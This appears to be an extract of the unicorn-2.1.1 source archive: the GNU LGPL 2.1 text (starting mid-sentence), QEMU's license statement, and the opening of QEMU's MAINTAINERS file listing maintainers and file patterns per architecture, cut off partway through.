changing it is not allowed. [This is the first released version of the Lesser GPL. It also counts as the successor of the GNU Library Public License, version 2, hence the version number 2.1.] Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This license, the Lesser General Public License, applies to some specially designated software packages--typically libraries--of the Free Software Foundation and other authors who decide to use it. You can use it too, but we suggest you first think carefully about whether this license or the ordinary General Public License is the better strategy to use in any particular case, based on the explanations below. When we speak of free software, we are referring to freedom of use, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish); that you receive source code or can get it if you want it; that you can change the software and use pieces of it in new free programs; and that you are informed that you can do these things. To protect your rights, we need to make restrictions that forbid distributors to deny you these rights or to ask you to surrender these rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library or if you modify it. For example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that we gave you. You must make sure that they, too, receive or can get the source code. If you link other code with the library, you must provide complete object files to the recipients, so that they can relink them with the library after making changes to the library and recompiling it. And you must show them these terms so they know their rights. We protect your rights with a two-step method: (1) we copyright the library, and (2) we offer you this license, which gives you legal permission to copy, distribute and/or modify the library. To protect each distributor, we want to make it very clear that there is no warranty for the free library. Also, if the library is modified by someone else and passed on, the recipients should know that what they have is not the original version, so that the original author's reputation will not be affected by problems that might be introduced by others. Finally, software patents pose a constant threat to the existence of any free program. We wish to make sure that a company cannot effectively restrict the users of a free program by obtaining a restrictive license from a patent holder. Therefore, we insist that any patent license obtained for a version of the library must be consistent with the full freedom of use specified in this license. Most GNU software, including some libraries, is covered by the ordinary GNU General Public License. This license, the GNU Lesser General Public License, applies to certain designated libraries, and is quite different from the ordinary General Public License. We use this license for certain libraries in order to permit linking those libraries into non-free programs. When a program is linked with a library, whether statically or using a shared library, the combination of the two is legally speaking a combined work, a derivative of the original library. The ordinary General Public License therefore permits such linking only if the entire combination fits its criteria of freedom. The Lesser General Public License permits more lax criteria for linking other code with the library. We call this license the "Lesser" General Public License because it does Less to protect the user's freedom than the ordinary General Public License. It also provides other free software developers Less of an advantage over competing non-free programs. These disadvantages are the reason we use the ordinary General Public License for many libraries. However, the Lesser license provides advantages in certain special circumstances. For example, on rare occasions, there may be a special need to encourage the widest possible use of a certain library, so that it becomes a de-facto standard. To achieve this, non-free programs must be allowed to use the library. A more frequent case is that a free library does the same job as widely used non-free libraries. In this case, there is little to gain by limiting the free library to free software only, so we use the Lesser General Public License. In other cases, permission to use a particular library in non-free programs enables a greater number of people to use a large body of free software. For example, permission to use the GNU C Library in non-free programs enables many more people to use the whole GNU operating system, as well as its variant, the GNU/Linux operating system. Although the Lesser General Public License is Less protective of the users' freedom, it does ensure that the user of a program that is linked with the Library has the freedom and the wherewithal to run that program using a modified version of the Library. The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, whereas the latter must be combined with the library in order to run. GNU LESSER GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License Agreement applies to any software library or other program which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Lesser General Public License (also called "this License"). Each licensee is addressed as "you". A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables. The "Library", below, refers to any such software library or work which has been distributed under these terms. A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library. Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does. 1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) The modified work must itself be a software library. b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change. c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library. In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices. Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to all subsequent copies and derivative works made from that copy. This option is useful when you wish to copy part of the code of the Library into a program that is not a library. 4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange. If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code. 5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License. However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables. When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.) Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself. 6. As an exception to the Sections above, you may also combine or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications. You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things: a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.) b) Use a suitable shared library mechanism for linking with the Library. A suitable mechanism is one that (1) uses at run time a copy of the library already present on the user's computer system, rather than copying library functions into the executable, and (2) will operate properly with a modified version of the library, if the user installs one, as long as the modified version is interface-compatible with the version that the work was made with. c) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution. d) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place. e) Verify that the user has already received a copy of these materials or that you have already sent this user a copy. For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the materials to be distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute. 7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things: a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above. b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work. 8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it. 10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties with this License. 11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 13. The Free Software Foundation may publish revised and/or new versions of the Lesser General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation. 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Libraries If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License). To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the library's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Also add information on how to contact you by electronic and paper mail. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the library `Frob' (a library for tweaking knobs) written by James Random Hacker. <signature of Ty Coon>, 1 April 1990 Ty Coon, President of Vice That's all there is to it! ����������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/LICENSE��������������������������������������������������������������������������0000664�0000000�0000000�00000002231�14675241067�0015156�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������The QEMU distribution includes both the QEMU emulator and various firmware files. These are separate programs that are distributed together for our users' convenience, and they have separate licenses. The following points clarify the license of the QEMU emulator: 1) The QEMU emulator as a whole is released under the GNU General Public License, version 2. 2) Parts of the QEMU emulator have specific licenses which are compatible with the GNU General Public License, version 2. Hence each source file contains its own licensing information. Source files with no licensing information are released under the GNU General Public License, version 2 or (at your option) any later version. As of July 2013, contributions under version 2 of the GNU General Public License (and no later version) are only accepted for the following files or directories: bsd-user/, linux-user/, hw/vfio/, hw/xen/xen_pt*. 3) The Tiny Code Generator (TCG) is mostly under the BSD or MIT licenses; but some parts may be GPLv2 or other licenses. Again, see the specific licensing information in each source file. 4) QEMU is a trademark of Fabrice Bellard. Fabrice Bellard and the QEMU team �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/MAINTAINERS����������������������������������������������������������������������0000664�0000000�0000000�00000177057�14675241067�0015671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������QEMU Maintainers ================ The intention of this file is not to establish who owns what portions of the code base, but to provide a set of names that developers can consult when they have a question about a particular subset and also to provide a set of names to be CC'd when submitting a patch to obtain appropriate review. In general, if you have a question about inclusion of a patch, you should consult qemu-devel and not any specific individual privately. Descriptions of section entries: M: Mail patches to: FullName <address@domain> Maintainers are looking after a certain area and must be CCed on patches. They are considered the main contact point. R: Designated reviewer: FullName <address@domain> These reviewers should be CCed on patches. Reviewers are familiar with the subject matter and provide feedback even though they are not maintainers. L: Mailing list that is relevant to this area These lists should be CCed on patches. W: Web-page with status/info Q: Patchwork web based patch tracking system site T: SCM tree type and location. Type is one of: git, hg, quilt, stgit. S: Status, one of the following: Supported: Someone is actually paid to look after this. Maintained: Someone actually looks after it. Odd Fixes: It has a maintainer but they don't have time to do much other than throw the odd patch in. See below. Orphan: No current maintainer [but maybe you could take the role as you write your new code]. Obsolete: Old code. Something tagged obsolete generally means it has been replaced by a better system and you should be using that. F: Files and directories with wildcard patterns. A trailing slash includes all files and subdirectory files. F: drivers/net/ all files in and below drivers/net F: drivers/net/* all files in drivers/net, but not below F: */net/* all files in "any top level directory"/net One pattern per line. Multiple F: lines acceptable. X: Files and directories that are NOT maintained, same rules as F: Files exclusions are tested before file matches. Can be useful for excluding a specific subdirectory, for instance: F: net/ X: net/ipv6/ matches all files in and below net excluding net/ipv6/ K: Keyword perl extended regex pattern to match content in a patch or file. For instance: K: of_get_profile matches patches or files that contain "of_get_profile" K: \b(printk|pr_(info|err))\b matches patches or files that contain one or more of the words printk, pr_info or pr_err One regex pattern per line. Multiple K: lines acceptable. General Project Administration ------------------------------ M: Peter Maydell <peter.maydell@linaro.org> All patches CC here L: qemu-devel@nongnu.org F: * F: */ Responsible Disclosure, Reporting Security Issues ------------------------------------------------- W: https://wiki.qemu.org/SecurityProcess M: Michael S. Tsirkin <mst@redhat.com> L: secalert@redhat.com Trivial patches --------------- Trivial patches M: Michael Tokarev <mjt@tls.msk.ru> M: Laurent Vivier <laurent@vivier.eu> S: Maintained L: qemu-trivial@nongnu.org K: ^Subject:.*(?i)trivial T: git git://git.corpit.ru/qemu.git trivial-patches T: git https://github.com/vivier/qemu.git trivial-patches Architecture support -------------------- S390 general architecture support M: Cornelia Huck <cohuck@redhat.com> S: Supported F: default-configs/s390x-softmmu.mak F: gdb-xml/s390*.xml F: hw/char/sclp*.[hc] F: hw/char/terminal3270.c F: hw/intc/s390_flic.c F: hw/intc/s390_flic_kvm.c F: hw/s390x/ F: hw/vfio/ap.c F: hw/vfio/ccw.c F: hw/watchdog/wdt_diag288.c F: include/hw/s390x/ F: include/hw/watchdog/wdt_diag288.h F: pc-bios/s390-ccw/ F: pc-bios/s390-ccw.img F: target/s390x/ F: docs/system/target-s390x.rst F: docs/system/s390x/ F: tests/migration/s390x/ K: ^Subject:.*(?i)s390x? T: git https://github.com/cohuck/qemu.git s390-next L: qemu-s390x@nongnu.org Guest CPU cores (TCG) --------------------- Overall TCG CPUs M: Richard Henderson <rth@twiddle.net> R: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: cpus.c F: exec.c F: accel/tcg/ F: accel/stubs/tcg-stub.c F: scripts/decodetree.py F: docs/devel/decodetree.rst F: include/exec/cpu*.h F: include/exec/exec-all.h F: include/exec/helper*.h F: include/exec/tb-hash.h F: include/sysemu/cpus.h F: include/sysemu/tcg.h FPU emulation M: Aurelien Jarno <aurelien@aurel32.net> M: Peter Maydell <peter.maydell@linaro.org> M: Alex Bennée <alex.bennee@linaro.org> S: Maintained F: fpu/ F: include/fpu/ F: tests/fp/ Alpha TCG CPUs M: Richard Henderson <rth@twiddle.net> S: Maintained F: target/alpha/ F: tests/tcg/alpha/ F: disas/alpha.c ARM TCG CPUs M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: target/arm/ F: tests/tcg/arm/ F: tests/tcg/aarch64/ F: hw/arm/ F: hw/cpu/a*mpcore.c F: include/hw/cpu/a*mpcore.h F: disas/arm.c F: disas/arm-a64.cc F: disas/libvixl/ F: docs/system/target-arm.rst ARM SMMU M: Eric Auger <eric.auger@redhat.com> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/smmu* F: include/hw/arm/smmu* CRIS TCG CPUs M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: target/cris/ F: hw/cris/ F: include/hw/cris/ F: tests/tcg/cris/ F: disas/cris.c HPPA (PA-RISC) TCG CPUs M: Richard Henderson <rth@twiddle.net> S: Maintained F: target/hppa/ F: hw/hppa/ F: disas/hppa.c F: hw/net/*i82596* F: include/hw/net/lasi_82596.h LM32 TCG CPUs M: Michael Walle <michael@walle.cc> S: Maintained F: target/lm32/ F: disas/lm32.c F: hw/lm32/ F: hw/*/lm32_* F: hw/*/milkymist-* F: include/hw/display/milkymist_tmu2.h F: include/hw/char/lm32_juart.h F: include/hw/lm32/ F: tests/tcg/lm32/ M68K TCG CPUs M: Laurent Vivier <laurent@vivier.eu> S: Maintained F: target/m68k/ F: disas/m68k.c MicroBlaze TCG CPUs M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: target/microblaze/ F: hw/microblaze/ F: disas/microblaze.c MIPS TCG CPUs M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> R: Aurelien Jarno <aurelien@aurel32.net> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Maintained F: target/mips/ F: default-configs/*mips* F: disas/*mips* F: docs/system/cpu-models-mips.rst.inc F: hw/intc/mips_gic.c F: hw/mips/ F: hw/misc/mips_* F: hw/timer/mips_gictimer.c F: include/hw/intc/mips_gic.h F: include/hw/mips/ F: include/hw/misc/mips_* F: include/hw/timer/mips_gictimer.h F: tests/acceptance/linux_ssh_mips_malta.py F: tests/acceptance/machine_mips_malta.py F: tests/tcg/mips/ K: ^Subject:.*(?i)mips Moxie TCG CPUs M: Anthony Green <green@moxielogic.com> S: Maintained F: target/moxie/ F: disas/moxie.c F: hw/moxie/ F: default-configs/moxie-softmmu.mak NiosII TCG CPUs M: Chris Wulff <crwulff@gmail.com> M: Marek Vasut <marex@denx.de> S: Maintained F: target/nios2/ F: hw/nios2/ F: hw/intc/nios2_iic.c F: disas/nios2.c F: default-configs/nios2-softmmu.mak OpenRISC TCG CPUs M: Stafford Horne <shorne@gmail.com> S: Odd Fixes F: target/openrisc/ F: hw/openrisc/ F: tests/tcg/openrisc/ PowerPC TCG CPUs M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Maintained F: target/ppc/ F: hw/ppc/ F: include/hw/ppc/ F: disas/ppc.c RISC-V TCG CPUs M: Palmer Dabbelt <palmer@dabbelt.com> M: Alistair Francis <Alistair.Francis@wdc.com> M: Sagar Karandikar <sagark@eecs.berkeley.edu> M: Bastian Koppelmann <kbastian@mail.uni-paderborn.de> L: qemu-riscv@nongnu.org S: Supported F: target/riscv/ F: hw/riscv/ F: include/hw/riscv/ F: linux-user/host/riscv32/ F: linux-user/host/riscv64/ RENESAS RX CPUs M: Yoshinori Sato <ysato@users.sourceforge.jp> S: Maintained F: target/rx/ S390 TCG CPUs M: Richard Henderson <rth@twiddle.net> M: David Hildenbrand <david@redhat.com> S: Maintained F: target/s390x/ F: hw/s390x/ F: disas/s390.c F: tests/tcg/s390x/ L: qemu-s390x@nongnu.org SH4 TCG CPUs M: Aurelien Jarno <aurelien@aurel32.net> S: Odd Fixes F: target/sh4/ F: hw/sh4/ F: disas/sh4.c F: include/hw/sh4/ SPARC TCG CPUs M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> M: Artyom Tarasenko <atar4qemu@gmail.com> S: Maintained F: target/sparc/ F: hw/sparc/ F: hw/sparc64/ F: include/hw/sparc/sparc64.h F: disas/sparc.c UniCore32 TCG CPUs M: Guan Xuetao <gxt@mprc.pku.edu.cn> S: Maintained F: target/unicore32/ F: hw/unicore32/ F: include/hw/unicore32/ X86 TCG CPUs M: Paolo Bonzini <pbonzini@redhat.com> M: Richard Henderson <rth@twiddle.net> M: Eduardo Habkost <ehabkost@redhat.com> S: Maintained F: target/i386/ F: tests/tcg/i386/ F: tests/tcg/x86_64/ F: hw/i386/ F: disas/i386.c F: docs/system/cpu-models-x86.rst.inc T: git https://github.com/ehabkost/qemu.git x86-next Xtensa TCG CPUs M: Max Filippov <jcmvbkbc@gmail.com> W: http://wiki.osll.ru/doku.php?id=etc:users:jcmvbkbc:qemu-target-xtensa S: Maintained F: target/xtensa/ F: hw/xtensa/ F: tests/tcg/xtensa/ F: disas/xtensa.c F: include/hw/xtensa/xtensa-isa.h F: default-configs/xtensa*.mak TriCore TCG CPUs M: Bastian Koppelmann <kbastian@mail.uni-paderborn.de> S: Maintained F: target/tricore/ F: hw/tricore/ F: include/hw/tricore/ Multiarch Linux User Tests M: Alex Bennée <alex.bennee@linaro.org> S: Maintained F: tests/tcg/multiarch/ Guest CPU Cores (KVM) --------------------- Overall KVM CPUs M: Paolo Bonzini <pbonzini@redhat.com> L: kvm@vger.kernel.org S: Supported F: */kvm.* F: accel/kvm/ F: accel/stubs/kvm-stub.c F: include/hw/kvm/ F: include/sysemu/kvm*.h F: scripts/kvm/kvm_flightrecorder ARM KVM CPUs M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: target/arm/kvm.c MIPS KVM CPUs M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> S: Odd Fixes F: target/mips/kvm.c PPC KVM CPUs M: David Gibson <david@gibson.dropbear.id.au> S: Maintained F: target/ppc/kvm.c S390 KVM CPUs M: Halil Pasic <pasic@linux.ibm.com> M: Cornelia Huck <cohuck@redhat.com> M: Christian Borntraeger <borntraeger@de.ibm.com> S: Supported F: target/s390x/kvm.c F: target/s390x/kvm_s390x.h F: target/s390x/kvm-stub.c F: target/s390x/ioinst.[ch] F: target/s390x/machine.c F: target/s390x/sigp.c F: target/s390x/cpu_features*.[ch] F: target/s390x/cpu_models.[ch] F: hw/intc/s390_flic.c F: hw/intc/s390_flic_kvm.c F: include/hw/s390x/s390_flic.h F: gdb-xml/s390*.xml T: git https://github.com/cohuck/qemu.git s390-next T: git https://github.com/borntraeger/qemu.git s390-next L: qemu-s390x@nongnu.org X86 KVM CPUs M: Paolo Bonzini <pbonzini@redhat.com> M: Marcelo Tosatti <mtosatti@redhat.com> L: kvm@vger.kernel.org S: Supported F: target/i386/kvm.c F: scripts/kvm/vmxcap X86 HVF CPUs M: Roman Bolshakov <r.bolshakov@yadro.com> S: Maintained F: accel/stubs/hvf-stub.c F: target/i386/hvf/ F: include/sysemu/hvf.h WHPX CPUs M: Sunil Muthuswamy <sunilmut@microsoft.com> S: Supported F: target/i386/whpx-all.c F: target/i386/whp-dispatch.h F: accel/stubs/whpx-stub.c F: include/sysemu/whpx.h Guest CPU Cores (Xen) --------------------- X86 Xen CPUs M: Stefano Stabellini <sstabellini@kernel.org> M: Anthony Perard <anthony.perard@citrix.com> M: Paul Durrant <paul@xen.org> L: xen-devel@lists.xenproject.org S: Supported F: */xen* F: hw/9pfs/xen-9p* F: hw/char/xen_console.c F: hw/display/xenfb.c F: hw/net/xen_nic.c F: hw/usb/xen-usb.c F: hw/block/xen* F: hw/block/dataplane/xen* F: hw/xen/ F: hw/xenpv/ F: hw/i386/xen/ F: hw/pci-host/xen_igd_pt.c F: include/hw/block/dataplane/xen* F: include/hw/xen/ F: include/sysemu/xen-mapcache.h Guest CPU Cores (HAXM) --------------------- X86 HAXM CPUs M: Wenchao Wang <wenchao.wang@intel.com> M: Colin Xu <colin.xu@intel.com> L: haxm-team@intel.com W: https://github.com/intel/haxm/issues S: Maintained F: include/sysemu/hax.h F: target/i386/hax-* Hosts ----- LINUX M: Michael S. Tsirkin <mst@redhat.com> M: Cornelia Huck <cohuck@redhat.com> M: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: linux-headers/ F: scripts/update-linux-headers.sh POSIX M: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: os-posix.c F: include/sysemu/os-posix.h F: util/*posix*.c F: include/qemu/*posix*.h NETBSD M: Kamil Rytarowski <kamil@netbsd.org> S: Maintained K: ^Subject:.*(?i)NetBSD OPENBSD M: Brad Smith <brad@comstyle.com> S: Maintained K: ^Subject:.*(?i)OpenBSD W32, W64 M: Stefan Weil <sw@weilnetz.de> S: Maintained F: *win32* F: */*win32* F: include/*/*win32* X: qga/*win32* F: qemu.nsi Alpha Machines -------------- M: Richard Henderson <rth@twiddle.net> S: Maintained F: hw/alpha/ F: hw/isa/smc37c669-superio.c F: tests/tcg/alpha/system/ ARM Machines ------------ Allwinner-a10 M: Beniamino Galvani <b.galvani@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/*/allwinner* F: include/hw/*/allwinner* F: hw/arm/cubieboard.c Allwinner-h3 M: Niek Linnenbank <nieklinnenbank@gmail.com> L: qemu-arm@nongnu.org S: Maintained F: hw/*/allwinner-h3* F: include/hw/*/allwinner-h3* F: hw/arm/orangepi.c F: docs/system/orangepi.rst ARM PrimeCell and CMSDK devices M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/char/pl011.c F: include/hw/char/pl011.h F: hw/display/pl110* F: hw/dma/pl080.c F: include/hw/dma/pl080.h F: hw/dma/pl330.c F: hw/gpio/pl061.c F: 